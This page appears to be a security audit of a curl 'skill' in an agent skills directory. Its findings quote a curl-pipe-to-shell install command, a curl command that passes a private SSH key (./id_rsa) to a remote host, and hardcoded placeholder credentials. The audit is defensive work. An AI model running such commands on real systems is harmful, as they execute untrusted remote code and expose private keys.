The Agent Skills Directory

[REMOTE_CODE_EXECUTION]: The skill contains the instruction curl -fsSL https://example.com/install.sh | sh, which is a classic remote code execution pattern. This command fetches a script from an untrusted external source and pipes it directly into the shell for execution without any prior validation or human review.
[DATA_EXFILTRATION]: One example demonstrates the use of sensitive identity files: curl --ftp-ssl --user "test:test" -l sftp://example.com:22/ --key ./id_rsa --pubkey ./id_rsa.pub. Accessing private SSH keys (./id_rsa) is a high-risk operation that could lead to the exposure and theft of credentials.
[CREDENTIALS_UNSAFE]: Multiple examples incorporate hardcoded or placeholder authentication credentials, such as username:password, test:test, and PRIVATE-TOKEN: ?. These patterns promote insecure practices for handling secrets and tokens.
[COMMAND_EXECUTION]: The skill provides a variety of shell commands that perform network operations, file uploads (curl -T), and directory listings on remote servers. These commands provide a significant surface area for interacting with both the local environment and external networks.

curl